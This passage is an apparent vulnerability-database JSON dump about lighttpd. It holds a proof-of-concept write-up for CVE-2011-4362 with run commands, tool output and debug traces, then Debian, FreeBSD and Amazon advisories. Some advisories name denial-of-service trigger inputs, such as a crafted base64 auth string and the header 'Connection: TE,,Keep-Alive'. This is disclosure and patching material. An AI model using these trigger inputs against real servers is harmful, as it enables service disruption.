126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n Usage: ./p_cve-2011-4362 <options>\r\n\r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... OK\r\n\r\n [+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n.\r\n.\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in \u0417Yg\\u00a7\u041e\u044an\u0446Xt\u0455]rze\u043b\u042b\u0444\u0455gY\u0443\u043f\\u0440\u044fYb\u043eY(\u0457d\u042f\u0448r\u0426[Y\u0443\u044a\u0429-\u00b7xi\u044e\u0438i\u00b0k\u0412Wp\u041b\t]߶\u0448\u0442\\u0434\u0412\u0427@V\u0428\u0434\u00a6x\u0443\u044a\u042dize \r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n", "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:DOC:27504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27504", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ---------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2368-1 security@debian.org\r\nhttp://www.debian.org/security/ Nico Golde\r\nDec 20th, 2011 http://www.debian.org/security/faq\r\n- ---------------------------------------------------------------------------\r\n\r\nPackage : lighttpd\r\nVulnerability : multiple\r\nProblem type : remote\r\nDebian-specific: no\r\nDebian bug : 652726\r\nCVE IDs : CVE-2011-4362 CVE-2011-3389\r\n\r\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\r\nwebserver with minimal memory footprint.\r\n\r\nCVE-2011-4362\r\n\r\n Xi Wang discovered that the base64 decoding routine which is used to\r\n decode user input during an HTTP authentication, suffers of a signedness\r\n issue when processing user input. As a result it is possible to force\r\n lighttpd to perform an out-of-bounds read which results in Denial of\r\n Service conditions.\r\n\r\nCVE-2011-3389\r\n\r\n When using CBC ciphers on an SSL enabled virtual host to communicate with\r\n certain client, a so called "BEAST" attack allows man-in-the-middle\r\n attackers to obtain plaintext HTTP traffic via a blockwise\r\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\r\n no lighttpd vulnerability. However, lighttpd offers a workaround to\r\n mitigate this problem by providing a possibility to disable CBC ciphers.\r\n\r\n This updates includes this option by default. System administrators\r\n are advised to read the NEWS file of this update (as this may break older\r\n clients).\r\n\r\n\r\nFor the oldstable distribution (lenny), this problem has been fixed in\r\nversion 1.4.19+lenny3.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.4.28-2+squeeze1.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1.4.30-1.\r\n\r\n\r\nWe recommend that you upgrade your lighttpd packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk7xJ1MACgkQHYflSXNkfP+N5ACgtImneTJSdyEiCLnWTFA0uxzz\r\nqP0An07LJwL5K3NmrMRfKeCVpigpn1zR\r\n=QU3k\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2011-12-26T00:00:00", "published": "2011-12-26T00:00:00", "id": "SECURITYVULNS:DOC:27485", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27485", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "description": "DoS on base64 parsing.", "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:VULN:12116", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12116", "title": "lighthttpd security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2877-1 security@debian.org\r\nhttp://www.debian.org/security/ Michael Gilbert\r\nMarch 12, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : lighttpd\r\nCVE ID : CVE-2014-2323 CVE-2014-2324\r\nDebian Bug : 741493\r\n\r\nSeveral vulnerabilities were discovered in the lighttpd web server.\r\n\r\nCVE-2014-2323\r\n\r\n Jann Horn discovered that specially crafted host names can be used\r\n to inject arbitrary MySQL queries in lighttpd servers using the\r\n MySQL virtual hosting module (mod_mysql_vhost).\r\n\r\n This only affects installations with the lighttpd-mod-mysql-vhost\r\n binary package installed and in use.\r\n\r\nCVE-2014-2324\r\n\r\n Jann Horn discovered that specially crafted host names can be used\r\n to traverse outside of the document root under certain situations\r\n in lighttpd servers using either the mod_mysql_vhost, mod_evhost,\r\n or mod_simple_vhost virtual hosting modules.\r\n\r\n Servers not using these modules are not affected.\r\n\r\nFor the oldstable distribution (squeeze), these problems have been fixed in\r\nversion 1.4.28-2+squeeze1.6.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 1.4.31-4+deb7u3.\r\n\r\nFor the testing distribution (jessie), these problems will be fixed soon.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 1.4.33-1+nmu3.\r\n\r\nWe recommend that you upgrade your lighttpd packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQQcBAEBCgAGBQJTISlcAAoJELjWss0C1vRzdLsf/1umcpRFMVfpb8kJhN9f+KiN\r\nqDASrwyL92FjUknXMP3PjeromIVODaPsCRK9C6zzeCCbNhk97Q2B2fFGVgEVaMmr\r\nv52T6PMyQy0bmWHy1O/aC30JBK5CAs0f/IWscqdKvNsOOTx+lVyWRsdRQfK059i1\r\notvQBsh25ro7jTGXcK1JA1ZTlpr41tmJoTyZR7npY5pEpVq9R9Sjyf/rnKv9RZHW\r\nMJaH3mD8J3gSlQyI+Ff8mAaCI2eMfBUocbAgRZRUwD1jGAM8OSr+PhmTTuMZTUq+\r\nvsa68sLUwUiS10/nJVZDqH5TTcEgs9f1MnOpuBGtpdtw1pMAF51j73crEiJwXpUl\r\njIFvPvBopU1I6EQ2NEz8rj+WCbFeY6kE2FdZmJzUCG5qzBb07Uj0mAgIu8jr1XCJ\r\niEo6ngK3PWrG+8gWl2z7yUT8IrTYValb6Al1rr2NeW3QlfBgSSRtKtpYJ+QU4Jb4\r\n+/7wMUTTwN4G3OzeugB1541CH6KaVSR+1R7BaI+sLvPwf4CSQB3SY04nwRdoYJGg\r\nLa92sLzDI6tc0ETtgApa7akWYvpTcb940SYnUrjz56TOUUdfnDh1ELseFgVAHScz\r\nGqiiPcXm17C7O1SVjUq4VO6NAGgwoBBGdwozK1+FoiSka353rnPB4Sf6pGK9Z/ng\r\nM41qbfBEvSRyUi+6Y4tipRujgRceZwPzXa/ASEGNv98apXaLcMPFhcq5EY7VEY3u\r\nxsAqswdbGUea817rm0XO4A20rwCxCatU61ftDHmsrhwqf2HRzfCgYvFx9JF0S36P\r\nJllrmZqt2wwoZDDQZFKimFGd+UAvRzIjW+Gj3Z1a3LGzn/eRj756TsCZh3D/hGdx\r\niBYYZoYY1DYJ1myL0m4MJxugVkMIAEerVcWVzAjDd6lKhFHLHpa6WPQENEYBw9ek\r\nClB7bPLRwXiy2UGk4akMznl/vsMhzj++p/zN07sLnZWMLEvxSggGmiFhE9+IHvCp\r\nWFJsvc0+miqyJboy7GX3rjNGAoc7yvwsdPm4wwpGJSqC8N/ZDkUCYe5nHmcHt79f\r\nzo/5lUOa87RW/RlrToCig4adXbwk6AKWaoBu7k+C2+VZeIGqHS2oeZrAYhVHDt/A\r\nomFUi2wCN8kQPqDuX8e0EXH+AfinBs+vqB9pavFgMYverqrIoXeL3PPC9XqhAvAf\r\n6yIj9HqFNmLCfBtw3JRLFnnzeErPJvR5/FNYh1yeW/OR8b2B5mnyYeU038aB/j3A\r\n/zsrRABWKdfvb2tTA5cl6DhxBaPKjUJ29ha6325QOLinhbbInKqRrMMjUDqdS2Cy\r\nQD5D2wHpd7ZMbhsa9FDklWnoKcbn5dWp0dUnfkhG8biZsU8bBEdY8gwJS0gD468=\r\n=z7Zk\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2014-03-24T00:00:00", "published": "2014-03-24T00:00:00", "id": "SECURITYVULNS:DOC:30381", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30381", "title": "[SECURITY] [DSA 2877-1] lighttpd security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "description": "SQL injection, directory traversal.", "modified": "2014-03-24T00:00:00", "published": "2014-03-24T00:00:00", "id": "SECURITYVULNS:VULN:13626", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13626", "title": "lighttpd security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "unix", "description": "\nlighttpd security advisories report:\n\nIt is possible to inadvertantly enable vulnerable ciphers when using\n\t ssl.cipher-list.\n\n\nIn certain cases setuid() and similar can fail, potentially triggering\n\t lighttpd to restart running as root.\n\n\nIf FAMMonitorDirectory fails, the memory intended to store the context is\n\t released; some lines below the \"version\" compoment of that context is read.\n\t Reading invalid data doesn't matter, but the memory access could trigger a\n\t segfault.\n\n", "modified": "2013-11-28T00:00:00", "published": "2013-11-28T00:00:00", "id": "90B27045-9530-11E3-9D09-000C2980A9F3", "href": "https://vuxml.freebsd.org/freebsd/90b27045-9530-11e3-9d09-000c2980a9f3.html", "title": "lighttpd -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:54", "bulletinFamily": "unix", "description": "\nUS-CERT/NIST reports:\n\nInteger signedness error in the base64_decode function in the\n\t HTTP authentication functionality (http_auth.c) in lighttpd 1.4\n\t before 1.4.30 and 1.5 before SVN revision 2806 allows remote\n\t attackers to cause a denial of service (segmentation fault)\n\t via crafted base64 input that triggers an out-of-bounds read\n\t with a negative index.\n\n", "modified": "2011-11-29T00:00:00", "published": "2011-11-29T00:00:00", "id": "C6521B04-314B-11E1-9CF4-5404A67EEF98", "href": "https://vuxml.freebsd.org/freebsd/c6521b04-314b-11e1-9cf4-5404a67eef98.html", "title": "lighttpd -- remote DoS in HTTP authentication", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:33:43", "bulletinFamily": "unix", "description": "\nLighttpd security advisory reports:\n\nCertain Connection header values will trigger an endless loop, for example:\n\t \"Connection: TE,,Keep-Alive\"\nOn receiving such value, lighttpd will enter an endless loop,\n\t detecting an empty token but not incrementing the current string\n\t position, and keep reading the ',' again and again.\nThis bug was introduced in 1.4.31, when we fixed an \"invalid read\"\n\t bug (it would try to read the byte before the string if it started\n\t with ',', although the value wasn't actually used).\n\n", "modified": "2012-11-17T00:00:00", "published": "2012-11-17T00:00:00", "id": "1CD3CA42-33E6-11E2-A255-5404A67EEF98", "href": "https://vuxml.freebsd.org/freebsd/1cd3ca42-33e6-11e2-a255-5404a67eef98.html", "title": "lighttpd -- remote DoS in header parsing", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:42", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2795-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nNovember 13, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-4508 CVE-2013-4559 CVE-2013-4560\nDebian Bug : 729453\n\nSeveral vulnerabilities have been discovered in the lighttpd web server.\n\nCVE-2013-4508\n\n It was discovered that lighttpd uses weak ssl ciphers when SNI (Server\n Name Indication) is enabled. This issue was solved by ensuring that\n stronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559\n\n The clang static analyzer was used to discover privilege escalation\n issues due to missing checks around lighttpd's setuid, setgid, and\n setgroups calls. Those are now appropriately checked.\n\nCVE-2013-4560\n\n The clang static analyzer was used to discover a use-after-free issue\n when the FAM stat cache engine is enabled, which is now fixed.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.4.28-2+squeeze1.4.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.4.31-4+deb7u1.\n\nFor the testing distribution (jessie), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion lighttpd_1.4.33-1+nmu1.\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2013-11-13T06:11:59", "published": "2013-11-13T06:11:59", "id": "DEBIAN:DSA-2795-1:2DAAE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00207.html", "title": "[SECURITY] [DSA 2795-1] lighttpd security update", "type": "debian", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:00", "bulletinFamily": "unix", "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during an HTTP authentication, suffers of a signedness\n issue when processing user input. As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain client, a so called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "modified": "2011-12-21T00:21:08", "published": "2011-12-21T00:21:08", "id": "DEBIAN:DSA-2381-:320B8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00246.html", "title": "[SECURITY] [DSA 2381-] lighttpd security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:21:25", "bulletinFamily": "unix", "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during an HTTP authentication, suffers of a signedness\n issue when processing user input. As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain client, a so called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "modified": "2011-12-21T00:42:08", "published": "2011-12-21T00:42:08", "id": "DEBIAN:DSA-2368-1:91542", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00247.html", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:21:58", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2877-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nMarch 12, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : lighttpd\nCVE ID : CVE-2014-2323 CVE-2014-2324\nDebian Bug : 741493\n\nSeveral vulnerabilities were discovered in the lighttpd web server.\n\nCVE-2014-2323\n\n Jann Horn discovered that specially crafted host names can be used\n to inject arbitrary MySQL queries in lighttpd servers using the\n MySQL virtual hosting module (mod_mysql_vhost).\n\n This only affects installations with the lighttpd-mod-mysql-vhost\n binary package installed and in use.\n\nCVE-2014-2324\n\n Jann Horn discovered that specially crafted host names can be used\n to traverse outside of the document root under certain situations\n in lighttpd servers using either the mod_mysql_vhost, mod_evhost,\n or mod_simple_vhost virtual hosting modules.\n\n Servers not using these modules are not affected.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.4.28-2+squeeze1.6.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.4.31-4+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.4.33-1+nmu3.\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-03-13T04:28:52", "published": "2014-03-13T04:28:52", "id": "DEBIAN:DSA-2877-1:CD2D1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00048.html", "title": "[SECURITY] [DSA 2877-1] lighttpd security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2019-05-29T17:22:30", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nUse-after-free vulnerability in lighttpd before 1.4.33 allows remote attackers to cause a denial of service (segmentation fault and crash) via unspecified vectors that trigger FAMMonitorDirectory failures. \n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphers, which makes it easier for remote attackers to hijack sessions by inserting packets into the client-server data stream or obtain sensitive information by sniffing the network. \n\nlighttpd before 1.4.33 does not check the return value of the (1) setuid, (2) setgid, or (3) setgroups functions, which might cause lighttpd to run as root if it is restarted and allows remote attackers to gain privileges, as demonstrated by multiple calls to the clone function that cause setuid to fail when the user process limit is reached. \n\n \n**Affected Packages:** \n\n\nlighttpd\n\n \n**Issue Correction:** \nRun _yum update lighttpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n lighttpd-mod_geoip-1.4.34-4.12.amzn1.i686 \n lighttpd-fastcgi-1.4.34-4.12.amzn1.i686 \n lighttpd-debuginfo-1.4.34-4.12.amzn1.i686 \n lighttpd-1.4.34-4.12.amzn1.i686 \n lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1.i686 \n \n src: \n lighttpd-1.4.34-4.12.amzn1.src \n \n x86_64: \n lighttpd-fastcgi-1.4.34-4.12.amzn1.x86_64 \n lighttpd-mod_geoip-1.4.34-4.12.amzn1.x86_64 \n lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1.x86_64 \n lighttpd-debuginfo-1.4.34-4.12.amzn1.x86_64 \n lighttpd-1.4.34-4.12.amzn1.x86_64 \n \n \n", "modified": "2014-09-16T22:37:00", "published": "2014-09-16T22:37:00", "id": "ALAS-2014-299", "href": "https://alas.aws.amazon.com/ALAS-2014-299.html", "title": "Medium: lighttpd", "type": "amazon", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:22:53", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nThe http_request_split_value function in request.c in lighttpd before 1.4.32 allows remote attackers to cause a denial of service (infinite loop) via a request with a header containing an empty token, as demonstrated using the \"Connection: TE,,Keep-Alive\" header. \n\n \n**Affected Packages:** \n\n\nlighttpd\n\n \n**Issue Correction:** \nRun _yum update lighttpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n lighttpd-mod_geoip-1.4.31-1.5.amzn1.i686 \n lighttpd-debuginfo-1.4.31-1.5.amzn1.i686 \n lighttpd-1.4.31-1.5.amzn1.i686 \n lighttpd-mod_mysql_vhost-1.4.31-1.5.amzn1.i686 \n lighttpd-fastcgi-1.4.31-1.5.amzn1.i686 \n \n src: \n lighttpd-1.4.31-1.5.amzn1.src \n \n x86_64: \n lighttpd-debuginfo-1.4.31-1.5.amzn1.x86_64 \n lighttpd-mod_mysql_vhost-1.4.31-1.5.amzn1.x86_64 \n lighttpd-mod_geoip-1.4.31-1.5.amzn1.x86_64 \n lighttpd-fastcgi-1.4.31-1.5.amzn1.x86_64 \n lighttpd-1.4.31-1.5.amzn1.x86_64 \n \n \n", "modified": "2014-09-15T22:49:00", "published": "2014-09-15T22:49:00", "id": "ALAS-2013-179", "href": "https://alas.aws.amazon.com/ALAS-2013-179.html", "title": "Medium: lighttpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:22:43", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nInteger signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.\n\n \n**Affected Packages:** \n\n\nlighttpd\n\n \n**Issue Correction:** \nRun _yum update lighttpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n lighttpd-fastcgi-1.4.31-1.2.amzn1.i686 \n lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.i686 \n lighttpd-debuginfo-1.4.31-1.2.amzn1.i686 \n lighttpd-mod_geoip-1.4.31-1.2.amzn1.i686 \n lighttpd-1.4.31-1.2.amzn1.i686 \n \n src: \n lighttpd-1.4.31-1.2.amzn1.src \n \n x86_64: \n lighttpd-fastcgi-1.4.31-1.2.amzn1.x86_64 \n lighttpd-debuginfo-1.4.31-1.2.amzn1.x86_64 \n lighttpd-1.4.31-1.2.amzn1.x86_64 \n lighttpd-mod_geoip-1.4.31-1.2.amzn1.x86_64 \n lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T16:45:00", "published": "2014-09-14T16:45:00", "id": "ALAS-2012-107", "href": "https://alas.aws.amazon.com/ALAS-2012-107.html", "title": "Medium: lighttpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:55:59", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30003", "id": "SSV:30003", "type": "seebug", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "sourceData": "\n 29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n \r\n \r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n \r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n \r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n \r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 